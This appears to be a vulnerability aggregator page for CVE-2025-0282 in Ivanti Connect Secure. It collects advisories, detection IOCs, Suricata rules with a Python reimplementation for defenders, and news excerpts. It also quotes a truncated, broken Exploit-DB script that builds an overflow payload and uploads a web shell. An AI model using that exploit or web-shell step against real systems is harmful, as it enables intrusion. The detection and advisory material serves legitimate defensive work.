CVE-2025-0282
Published 2025-01-08
Priority: P1 (100) · CVSS 3.1 base score 9 (Critical)
Vector: AV:N / AC:H / PR:N / UI:N / S:C / C:H / I:H / A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-01-15
Exploited in the wild
EPSS: 99.97% (100.0th percentile)
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | 22.7R2 – 22.7R2.4 | — |
| ivanti | neurons_for_zero-trust_access | — | — |
| ivanti | neurons_for_zta_gateways | 22.7R2 – 22.7R2.3 | — |
| ivanti | policy_secure | — | — |
| ivanti | policy_secure | 22.7R1 – 22.7R1.2 | — |
Detection & IOCs (extracted from sources)
- XOR key 0x27
- Use the forged/fake Ivanti certificate sent unencrypted over the internet as a network signature to detect active RESURGE compromise.
- Check for the misspelled string 'DCOMLIENT' (missing 'C') in DLL binaries as an indicator of the malicious vixDiskLib.dll backdoor.
- Monitor for svchost.exe spawned in a suspended state followed by process hollowing, as used by the vixDiskLib.dll/deelevator64.dll backdoor to load decrypted payloads.
- Check for absence or deletion of /var/cores directory contents and deletion of /data/runtime/logs/log.events.vc0 and /data/var/dlogs/debuglog as anti-forensic indicators on Ivanti appliances.
- Detect the attacker reconnaissance phase by monitoring for URL queries to ICS appliances designed to enumerate the appliance version, originating from VPS providers or Tor networks.
- Alert on SELinux being disabled or the filesystem being remounted on Ivanti Connect Secure appliances as a post-exploitation preparation step.
- Monitor for nmap and dig execution on compromised Ivanti appliances as indicators of internal network reconnaissance post-exploitation.
- The fake Ivanti certificate used by RESURGE is only for authentication/verification and is not used to encrypt communication, but it does impersonate the legitimate server to evade detection.
- Unit 42 tracks this activity as CL-UNK-0979 and notes overlaps with Mandiant's UNC5337, but has not confirmed they are the same threat actor group.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.0 | CRITICAL | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
| VulnCheck | — | 9.0 | CRITICAL | — |
| CISA | — | 9.0 | CRITICAL | — |
Ivanti
vendor_ivanti · 2025-01-08 · CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Ivanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.
CVE IDs: CVE-2025-0282
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Remediation Due Date: 2025-01-15
Known to be used in ransomware campaigns.
CISA
cisa · 2025-01-08 · CVSS 9.0
CVE-2025-0282 [CRITICAL] CWE-121 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Affected: Ivanti Connect Secure, Policy Secure, and ZTA Gateways
Ivanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.
Required Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Notes: CISA Mitigation Instructions: https://www.cisa.gov/cisa-mitigation-instructions-CVE-2025-0282
Additional References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-C
GHSA
ghsa_unreviewed · 2025-01-09
CVE-2025-0282 [CRITICAL] CWE-121 GHSA-rf94-f4r9-6gxh: A stack-based buffer overflow in Ivanti Connect Secure before version 22
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
VulnCheck
vulncheck · 2025 · CVSS 9.0
CVE-2025-0282 [CRITICAL] CWE-121 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Ivanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.
Affected: Ivanti Connect Secure, Policy Secure, and ZTA Gateways
Required Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Known Ransomware Campaign Use: Known
Exploitation References: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day; https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gatewa
VulnCheck
vulncheck · 2025 · CVSS 7.0
CVE-2025-0283 [HIGH] Ivanti Connect Secure, Policy Secure, and Neurons stack-based buffer overflow
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
Affected: Ivanti Connect Secure, Policy Secure, and Neurons
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/active-exploitation-ivanti-vulnerabilities; https://www.wiz.io/blog/cve-2025-0282-and-cve-2025-0283-critical-ivanti-0days-exploited-in-the-wild; http
Suricata
suricata · 2025-01-13 · CVSS 9.0
CVE-2025-0282 [CRITICAL] ET EXPLOIT Ivanti Connect Secure VPN IF-T/TLS clientCapabilities Remote Code Execution (CVE-2025-0282)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Ivanti Connect Secure VPN IF-T/TLS clientCapabilities Remote Code Execution (CVE-2025-0282)"; flow:established,to_server; xbits:isset,ET.IFTTLS.HTTPRequest,track ip_pair; content:"|00 00|"; startswith; pcre:"/^(\x0a\x4c|\x05\x83)\x00\x00\x00\x88/R"; content:"clientCapabilities|3d|"; fast_pattern; pcre:"/^[^\x20\x0a]{257,}/R"; reference:url,labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/; reference:cve,2025-0282; classtype:attempted-admin; sid:2059171; rev:1; metadata:affected_product Ivanti, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 202
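The ET rule above reduces to two byte-level conditions: an 8-byte prefix (00 00, then 0a 4c or 05 83, then 00 00 00 88) and a `clientCapabilities=` value of 257 or more bytes containing neither a space nor a line feed. The following Python is an added example, not part of this page or of the Emerging Threats ruleset, that reimplements those two checks so an analyst can run them over decrypted payloads pulled from a pcap; the function and sample names are mine, the sample messages are constructed (filler bytes stand in for the rest of the IF-T/TLS header), and the rule's `flow` and `xbits` preconditions, which depend on connection state, are deliberately not modelled.

```python
import re

# Prefix the rule keys on: content "|00 00|" with startswith, then the relative
# pcre /^(\x0a\x4c|\x05\x83)\x00\x00\x00\x88/R.
IFT_PREFIX_RE = re.compile(rb"\A\x00\x00(?:\x0a\x4c|\x05\x83)\x00\x00\x00\x88")

# content "clientCapabilities|3d|" followed by pcre /^[^\x20\x0a]{257,}/R:
# capture every clientCapabilities value as the run of bytes that are neither
# space (0x20) nor line feed (0x0a).
CAPS_RE = re.compile(rb"clientCapabilities=([^\x20\x0a]*)")
MAX_BENIGN_LEN = 256  # the rule fires at {257,}


def longest_clientcapabilities_value(payload: bytes) -> int:
    """Length of the longest unbroken clientCapabilities value, or -1 if absent.

    Suricata's content match may hit any occurrence of the parameter, so every
    occurrence is measured rather than only the first.
    """
    lengths = [len(m.group(1)) for m in CAPS_RE.finditer(payload)]
    return max(lengths) if lengths else -1


def matches_et_2059171(payload: bytes) -> bool:
    """True when one to-server payload satisfies the rule's content/pcre checks.

    Not evaluated here (they need connection state): flow:established,to_server
    and the xbits ET.IFTTLS.HTTPRequest flag set by an earlier rule.
    """
    if not IFT_PREFIX_RE.match(payload):
        return False
    return longest_clientcapabilities_value(payload) > MAX_BENIGN_LEN


def build_sample(vendor: bytes, caps_value: bytes) -> bytes:
    """Constructed sample message (hypothetical, not a captured packet).

    Only the 8-byte prefix reproduces the rule; the 8 zero bytes after it are
    filler, not real IF-T/TLS length or sequence fields.
    """
    assert vendor in (b"\x0a\x4c", b"\x05\x83")
    return (b"\x00\x00" + vendor + b"\x00\x00\x00\x88"
            + b"\x00" * 8
            + b"clientCapabilities=" + caps_value + b"\x0a")


# Constructed test corpus: one message that should alert, four that should not.
SAMPLES = {
    "benign_short_value": build_sample(b"\x0a\x4c", b"A" * 40),
    "boundary_256": build_sample(b"\x05\x83", b"B" * 256),
    "oversized_257": build_sample(b"\x05\x83", b"C" * 257),
    # long value but wrong prefix: the rule's startswith/pcre would not match
    "oversized_wrong_prefix": (b"\x00\x00\x01\x02\x00\x00\x00\x88"
                               + b"clientCapabilities=" + b"D" * 300),
    # a space splits the value, so no single run reaches 257 bytes
    "value_broken_by_space": build_sample(b"\x0a\x4c",
                                          b"E" * 200 + b" " + b"E" * 200),
}


def flagged_samples() -> list:
    """Names of the constructed samples that the reimplemented rule would alert on."""
    return sorted(name for name, payload in SAMPLES.items()
                  if matches_et_2059171(payload))


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        length = longest_clientcapabilities_value(payload)
        print(f"{name:24} longest_value={length:4}  alert={matches_et_2059171(payload)}")
```

Because the `xbits` and `flow` conditions are skipped, a hit from this script is a candidate for review against the full session, not a confirmed alert.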
Suricata
suricata · 2025-01-09 · CVSS 9.0
CVE-2025-0282 [CRITICAL] ET WEB_SPECIFIC_APPS Ivanti Connect Secure Host Checker Recon (CVE-2025-0282)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti Connect Secure Host Checker Recon (CVE-2025-0282)"; flow:established,to_server; http.uri; content:"/dana-cached/hc/hc_launcher"; fast_pattern; pcre:"/^\x2e(?:\d+\x2e){4}jar/R"; reference:url,cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day; reference:cve,2025-0282; classtype:web-application-activity; sid:2059095; rev:1; metadata:affected_product Ivanti, attack_target Server, tls_state TLSDecrypt, created_at 2025_01_09, cve CVE_2025_0282, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Low, signature_severity Major, tag CISA_KEV, updated_at 2025_01_09, mitre_tactic_
Exploit-DB
exploitdb · 2025-04-15 · CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
---
# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
payload = b"A" * offset # Fill the buffer
payload += struct.pack(" /shell.php"
exploit_vulnerability(target_ip, command)
print("[+] Web shell uploaded successfully at /shell.php.")
verify_shell(target_ip)
except Exception as e:
print(f"[-] Error uploading web shell: {e}")
def verify_shell(t
Nuclei
nuclei · CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti Connect Secure - Stack-based Buffer Overflow
Ivanti Connect Secure < 22.7R2.5, Ivanti Policy Secure < 22.7R1.2, and Ivanti Neurons for ZTA gateways < 22.7R2.3 contain a stack-based buffer overflow in the clientCapabilities parameter handling. This vulnerability allows remote unauthenticated attackers to execute arbitrary code through IF-T TLS requests.
Template:
id: CVE-2025-0282
info:
name: Ivanti Connect Secure - Stack-based Buffer Overflow
author: ritikchaddha
severity: critical
description: |
Ivanti Connect Secure < 22.7R2.5, Ivanti Policy Secure < 22.7R1.2, and Ivanti Neurons for ZTA gateways < 22.7R2.3 contain a stack-based buffer overflow in the clientCapabilities parameter handling. This vulnerability allows remote unauthenticated attackers to execute arbitrary code thro
Mandiant
blogs_mandiant · 2026-03-05
Threat Intelligence
# Look What You Made Us Patch: 2025 Zero-Days in Review
March 5, 2026
##### Google Threat Intelligence Group
Written by: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan
### Executive Summary
Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels.
In 2025, we continued to observe the structural shift, first identified in 2024, toward increased enterprise exploitation. Both
Bleepingcomputer
blogs_bleepingcomputer · 2026-02-27 · CVSS 9.0
CVE-2025-0282 [CRITICAL] CISA warns that RESURGE malware can be dormant on Ivanti devices
By Bill Toulas
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released new details about RESURGE, a malicious implant used in zero-day attacks exploiting CVE-2025-0282 to breach Ivanti Connect Secure devices.
The update focuses on the implant's undetected latency on the appliances and its "sophisticated network-level evasion and authentication techniques" that enable covert communication with the attacker.
CISA originally documented the malware on March 28 last year, saying that it can survive reboots, create webshells for stealing credentials, create accounts, reset passwords, and escalate privileges.
According to researchers at incident response company Mandiant, the critical CVE-2025-0282 vuln
Recorded Future
blogs_recorded_future · 2026-02-19
## 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
- Exploitation and Misconfiguration
- Cloud Abuse
- Cloud Ransomware
- Credential Abuse, Account Takeover, and Unauthorized Access
- Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateway
Greynoiseio
blogs_greynoiseio · 2026-02-02
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
Bleepingcomputer
blogs_bleepingcomputer · 2025-08-22 · CVSS 9.8
[CRITICAL] Murky Panda hackers exploit cloud trust to hack downstream customers
By Lawrence Abrams
A Chinese state-sponsored hacking group known as Murky Panda (Silk Typhoon) exploits trusted relationships in cloud environments to gain initial access to the networks and data of downstream customers.
Murky Panda, also known as Silk Typhoon (Microsoft) and Hafnium, is known for targeting government, technology, academic, legal, and professional services organizations in North America.
The hacking group, under its numerous names, has been linked to numerous cyberespionage campaigns, including the wave of Microsoft Exchange breaches in 2021 that utilized the ProxyLogon vulnerability. More recent attacks include those on the U.S. Treasury's Office of Foreign Assets Control (OFAC) and the Committee
Tenable
blogs_tenable · 2025-05-09
Cybersecurity Snapshot: U.K. NCSC’s Best Cyber Advice on AI Security, the Quantum Threat, API Risks, Mobile Malware and More
Bleepingcomputer
blogs_bleepingcomputer · 2025-04-03 · CVSS 9.0
CVE-2025-22457 [CRITICAL] Ivanti patches Connect Secure zero-day exploited since mid-March
By Sergiu Gatlan
Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025.
Tracked as CVE-2025-22457, this critical security flaw is due to a stack-based buffer overflow weakness. It impacts Pulse Connect Secure 9.1x (which reached end-of-support in December), Ivanti Connect Secure 22.7R2.5 and earlier, Policy Secure, and Neurons for ZTA gateways.
According to Ivanti's advisory, remote threat actors can exploit it in high-complexity attacks that don't require authentication or user interaction. The company patched the vulnerability on February 11, 2025, with the release of Iva
Checkpoint
blogs_checkpoint · 2025-04-01
CVE-2025-2783 31st March – Threat Intelligence Report
## 31st March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 31st March, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
New York University (NYU) suffered a cyber-attack which resulted in the exposure of over 3 million applicants’ data, including names, test scores, majors, and zip codes. The hacker redirected NYU’s website to display this information, alleging the university’s continued use of race-sensitive admissions policies despite the Su
Bleepingcomputer
blogs_bleepingcomputer · 2025-03-05
## Silk Typhoon hackers now target IT supply chains to breach networks
By Bill Toulas
"After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives."
## Silk Typhoon storms IT supply chains
Silk Typhoon is a Chinese state-sponsored espionage group known for hacking the U.S. Office of Foreign Assets Control (OFAC) office in early December 2024 and stealing data from the Committee on Foreign Investment in the United States (CFIUS).
Microsoft reports that Silk Typhoon switched tactics around that period, abusing stolen API keys and compromised credentials for IT providers, identity manag
Tenable
blogs_tenable · 2025-02-14
Cybersecurity Snapshot: CISA Calls for Stamping Out Buffer Overflow Vulnerabilities, as Europol Tells Banks To Prep For Quantum Threat
Tenable
blogs_tenable · 2025-02-07
Cybersecurity Snapshot: Cyber Agencies Offer Best Practices for Network Edge Security, While OWASP Ranks Top Risks of Non-Human Identities
Wiz
blogs_wiz · 2025-02-06
Crying Out Cloud Newsletter - February 2025 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
Hype or no hype – Codefinger Ransomware Campaign Targeting S3 Buckets
Codefinger is a ransomware campaign that exploits AWS Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data in Amazon S3 buckets. While this campaign has sparked widespread concern, we argue that the panic is unwarranted. Many have focused on detecting unwanted SSE-C encryption as a mitigation strategy, but encryption is merely a tactic chosen by the attacker after gaining access—it is not the core issue. The real concern, which is neither new nor unique, is the use of compromised credential
Unit42
blogs_unit42 · 2025-01-17 · CVSS 9.0
CVE-2025-0282 [CRITICAL] Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
## Executive Summary
Unit 42 stopped monitoring this threat as well as updating this brief on March 11, 2025. Please refer to Ivanti's Security Advisory for the latest information.
On Jan. 8, 2025, Ivanti released a security advisory for two vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in its Connect Secure, Policy Secure and ZTA gateway products. This threat brief provides attack details that we observed in a recent incident response engagement to provide actionable intelligence to the community. These details can be used to further detect current attacks noted in the wild using CVE-2025-0282.
These Ivanti products are all appliances that facilitate remote connections into a network. As such, they are outward-facing assets that attackers could target to infiltrate a network.
CVE-
Unit42
blogs_unit42 · 2025-01-17 · CVSS 9.0
CVE-2025-0282 [CRITICAL] Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
## Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
Unit 42 · Published: January 16, 2025
Tags: High Profile Threats, Vulnerabilities, CL-UNK-0979, CVE-2025-0282, CVE-2025-0283, Ivanti, SPAWNMOLE, SPAWNSLOTH, SPAWNSNAIL, UNC5337
Bleepingcomputer
blogs_bleepingcomputer · 2025-01-13 · CVSS 9.0
[CRITICAL] UK domain registry Nominet confirms breach via Ivanti zero-day
By Sergiu Gatlan
Nominet, the official .UK domain registry and one of the largest country code registries, has confirmed that its network was breached two weeks ago using an Ivanti VPN zero-day vulnerability.
The company manages and operates over 11 million .uk, .co.uk, and .gov .uk domain names and other top-level domains, including .cymru and .wales.
It also ran the U.K.'s Protective Domain Name Service (PDNS) on behalf of the country's National Cyber Security Centre (NCSC) until September 2024, protecting over 1,200 organizations and over 7 million end users.
Nominet is still investigating the incident but has not found evidence of any backdoors deployed on its systems, as first reported by ISPreview.
Since it detec
Checkpoint
blogs_checkpoint · 2025-01-13
CVE-2025-0242 13th January – Threat Intelligence Report
## 13th January – Threat Intelligence Report
The International Civil Aviation Organization (ICAO), which is part of the UN, confirmed a compromise of its recruitment database that exposed 42,000 recruitment applications. The data contains records from April 2016 to July 2024 and includes recruitment-related information, such as names, email addresses, dates of birth, and employment history.
Argentina’s airport security police (PSA) has been compromised with threat actors gaining access to its payroll systems. The at
Wiz
blogs_wiz · 2025-01-09 · CVSS 9.0
CVE-2025-0282 [CRITICAL] CVE-2025-0282 and CVE-2025-0283: Ivanti 0days in the Wild | Wiz Blog
Ivanti has confirmed active exploitation of two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, in Ivanti Connect Secure (ICS) VPN appliances. CVE-2025-0282, a zero-day vulnerability, has been exploited since December 2024, enabling unauthenticated remote code execution. According to Mandiant, the ongoing campaign involves multiple malware families and appears to include several threat actors, notably the China-nexus group UNC5337. Ivanti strongly recommends that customers upgrade their ICS appliances to the latest versions to mitigate these vulnerabilities.
# What are CVE-2025-0282 and CVE-2025-0283?
## CVE-2025-0282
CVE-2025-0282 is an unauthenticated stack-based buffer overflow vulnerability in Ivanti Connect Secure (ICS) VPN appliances, also affecting Policy Secure and Neurons for
Bleepingcomputer
blogs_bleepingcomputer · 2025-01-09 · CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti zero-day attacks infected devices with custom malware
By Bill Toulas
Hackers exploiting the critical Ivanti Connect Secure zero-day vulnerability disclosed yesterday installed new malware called ‘Dryhook’ and ‘Phasejam’, not currently associated with any threat group, on compromised VPN appliances.
The security issue, now tracked as CVE-2025-0282, is a critical stack-based buffer overflow flaw that impacts Ivanti Connect Secure 22.7R2.5 and older, Ivanti Policy Secure 22.7R1.2 and older, and Ivanti Neurons for ZTA gateways 22.7R2.3 and older.
Although the flaw has a broad impact, the vendor specified that attacks were only observed against Connect Secure appliances while also noting that the number of affected customers is “limited.”
According to cybersecurity company M
Bleepingcomputer
blogs_bleepingcomputer · 2025-01-08 · CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti warns of new Connect Secure flaw used in zero-day attacks
By Lawrence Abrams
Ivanti is warning that hackers exploited a Connect Secure remote code execution vulnerability tracked as CVE-2025-0282 in zero-day attacks to install malware on appliances.
The company says it became aware of the vulnerabilities after the Ivanti Integrity Checker Tool (ICT) detected malicious activity on customers' appliances. Ivanti launched an investigation and confirmed that threat actors were actively exploiting CVE-2025-0282 as a zero-day.
CVE-2025-0282 is a critical (9.0) stack-based buffer overflow bug in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows an unauthenticated attacker
Tenable
CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
blogs_tenable·2025-01-08·CVSS 9.0
[CRITICAL] CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
Greynoiseio
NoiseLetter March 2026
blogs_greynoiseio
NoiseLetter March 2026
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Recorded Future
H1 2025 Malware and Vulnerability Trends
blogs_recorded_future
H1 2025 Malware and Vulnerability Trends
## H1 2025 Malware and Vulnerability Trends
## Executive Summary
The first half of 2025 (H1 2025) reflected a rapidly evolving threat landscape defined by the convergence of persistent legacy threats and advanced new tactics.
The total disclosed CVEs increased by 16% from H1 2024, and threat actors exploited 161 vulnerabilities with assigned CVEs, with nearly half linked to malware or ransomware campaigns. Microsoft remained the most targeted vendor, while edge security and gateway devices continued to be high-value targets for initial access. Malware activity was similarly dynamic: while law enforcement takedowns disrupted major players like LummaC2, a resurgence of legacy malware such as Sality indicated that old tools still offer utility for modern actors. Remote access trojans (RATs
Greynoiseio
NoiseLetter January 2025
blogs_greynoiseio
NoiseLetter January 2025
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape
blogs_recorded_future
2025 Cloud Threat Hunting and Defense Landscape
# 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
- Exploitation and Misconfiguration
- Cloud Abuse
- Cloud Ransomware
- Credential Abuse, Account Takeover, and Unauthorized Access
- Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security ga
arXiv
Automated Vulnerability Validation and Verification: A Large Language Model Approach
arxiv_fulltext·2025-11-13
Automated Vulnerability Validation and Verification: A Large Language Model Approach
Alireza Lotfi
Department of Computer Science
Purdue University
West Lafayette, IN, USA
Charalampos Katsis
Department of Computer Science
Purdue University
West Lafayette, IN, USA
Elisa Bertino
Department of Computer Science
Purdue University
West Lafayette, IN, USA
## Abstract
Software vulnerabilities remain a critical security challenge, providing entry points for attackers to compromise enterprise networks. Despite advances in security practices, the lack of high-quality datasets capturing the behavior of diverse exploits hinders effective vulnerability assessment and mitigation.
This paper introduces an end-to-end multi-step pipeline
References
- https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283
- https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
- https://www.cisa.gov/cisa-mitigation-instructions-cve-2025-0282
- https://github.com/sfewer-r7/CVE-2025-0282
- https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-0282
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2025-0282
Published: 2025-01-08
Added to CISA KEV: 2025-01-08
Exploited in the wild